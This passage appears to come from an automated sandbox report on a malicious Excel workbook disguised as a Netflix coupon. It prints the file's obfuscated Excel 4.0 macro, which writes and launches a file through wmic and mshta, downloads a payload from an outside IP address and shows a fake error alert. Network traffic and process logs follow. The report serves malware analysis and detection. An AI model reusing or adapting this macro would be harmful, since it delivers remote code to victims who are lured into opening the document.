                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.8544446133958745
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:Netflix coupon-32822.xlsb
                    File size:76536
                    MD5:61f534da1002124f4352bde4e786fec3
                    SHA1:da668a643616d9e283520b7f6604d011a0a2e8dd
                    SHA256:4449394fb44d3169450f8041fe0d5eaf202f6b743124d7f52327773e02c65541
                    SHA512:aee2907f7b5fd7017efe99a0e6cbb058176f34f9ca8c0ebc18079b13d0052aebb312b50cce1fc2e39e6981db4a53a08c2083272705791e40a253d2a105611e0e
                    SSDEEP:1536:UWIPqrE3gpMokPF58Ik4kosQFVvSuMA48b27wE1oM37/BrtcgdF:VpEwFkd58IXkOFVvMY4wEF7/NtcgdF
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "Netflix coupon-32822.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN(CHAR(67) & ":\ProgramData\QiLuJMFt" & CHAR(107) & "BaWg." & CHAR(114) & "tf", 3)
                    1,564,=A4396+B189
                    2,564,=A1254+A5845
                    3,564,=A4209+D2873
                    4,564,=B4230+D316
                    5,564,=A5344+C7039
                    6,564,=B8565+D4384
                    8,564,=C8321+B420
                    9,564,=D806+A9189
                    11,564,=D7860+A6323
                    12,564,=C4615+B4535
                    14,564,=D1804+D7015
                    15,564,=FOR.CELL("oVJKQe",Sheet1!BX170:BX4743, TRUE)
                    16,564,=D6217+D3964
                    17,564,=D6817+A8675
                    18,564,=B3761+B4689
                    22,564,=C1799+B995
                    23,564,=D8866+B7718
                    24,564,=A3035+A1778
                    26,564,=A4779+D3723
                    28,564,=C3880+C9877
                    29,564,=A6451+C1375
                    30,564,=FWRITE(0,CHAR(oVJKQe))
                    35,564,=A1076+D5213
                    37,564,=C2733+C8938
                    38,564,=B6512+A4740
                    39,564,=D272+A4646
                    40,564,=NEXT()
                    43,564,=C4218+C2105
                    44,564,=D3150+C1394
                    45,564,=B1308+A1267
                    46,564,=D8593+B9621
                    49,564,=D4273+A4152
                    51,564,=D1590+A6707
                    52,564,=B8511+A1475
                    53,564,=D5307+C5993
                    54,564,=B8675+A3754
                    55,564,=EXEC(CHAR(119) & "mi" & CHAR(99) & " pro" & CHAR(99) & CHAR(101) & CHAR(115) & "s call create" & CHAR(32) & CHAR(34) & CHAR(109) & "shta C:\P" & CHAR(114) & "ogramDa" & CHAR(116) & "a\QiL" & CHAR(117) & "JMFtk" & CHAR(66) & CHAR(97) & CHAR(87) & CHAR(103) & "" & CHAR(46) & "rt" & CHAR(102) & CHAR(34))
                    56,564,=A6609+C6167
                    64,564,=A9364+D3686
                    67,564,=D51+B3790
                    69,564,=CALL("urlmon", "URL" & CHAR(68) & "ow" & CHAR(110) & "loadT" & CHAR(111) & "FileA","JJCCJ" & CHAR(74), 0, "http" & CHAR(58) & "//158.1" & CHAR(52) & "0.185.205:8080/Q" & CHAR(50) & "W5" & CHAR(86) & "WU" & CHAR(70) & "L5VCMQ7JQPET" & CHAR(71) & "3C" & CHAR(67) & "TYX72Z4R25PDG", "" & CHAR(67) & ":\Progra" & CHAR(109) & CHAR(68) & "ata\hXYAtm" & CHAR(65) & "" & CHAR(99) & CHAR(108) & "X." & CHAR(116) & "xt",0,0)
                    70,564,=A1442+D2479
                    71,564,=C5783+C6339
                    72,564,=B3316+B1082
                    73,564,=C9931+A1605
                    74,564,=C6539+B7435
                    75,564,=C715+C6635
                    78,564,=A8359+A5038
                    79,564,=D3366+D7576
                    80,564,=ALERT("Error" & CHAR(33) & " Se" & CHAR(110) & "ding report to" & CHAR(32) & "Mi" & CHAR(99) & "rosoft...")
                    81,564,=C9843+D9887
                    84,564,=A8813+A7465
                    90,564,=FOPEN(CHAR(67) & CHAR(58) & "\ProgramData\hXYAt" & CHAR(109) & CHAR(65) & "clX.txt",1)
                    91,564,=D5085+C1248
                    94,564,=C7032+D8191
                    96,564,=B2373+C5548
                    97,564,=B2398+B9924
                    100,564,=D5471+A5557
                    102,564,=D389+A5179
                    104,564,=B3437+B2549
                    105,564,=SEND.MAIL(EVALUATE(FREAD(US91,255)))
                    110,564,=D6431+A9628
                    111,564,=D5322+A9665
                    112,564,=A1986+C8835
                    113,564,=B3020+C5551
                    114,564,=C6807+B2923
                    117,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 12:20:15.505403996 CET491668080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:15.685036898 CET808049166158.140.185.205192.168.2.22
                    Nov 25, 2021 12:20:16.186057091 CET491668080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:16.365947962 CET808049166158.140.185.205192.168.2.22
                    Nov 25, 2021 12:20:16.869518042 CET491668080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:17.053450108 CET808049166158.140.185.205192.168.2.22
                    Nov 25, 2021 12:20:17.060208082 CET491678080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:17.237730026 CET808049167158.140.185.205192.168.2.22
                    Nov 25, 2021 12:20:17.746174097 CET491678080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:17.923943043 CET808049167158.140.185.205192.168.2.22
                    Nov 25, 2021 12:20:18.432687998 CET491678080192.168.2.22158.140.185.205
                    Nov 25, 2021 12:20:18.611049891 CET808049167158.140.185.205192.168.2.22

                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:12:19:13
                    Start date:25/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13fdd0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:12:19:35
                    Start date:25/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf"
                    Imagebase:0xff110000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:12:19:36
                    Start date:25/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\QiLuJMFtkBaWg.rtf
                    Imagebase:0x13fb20000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >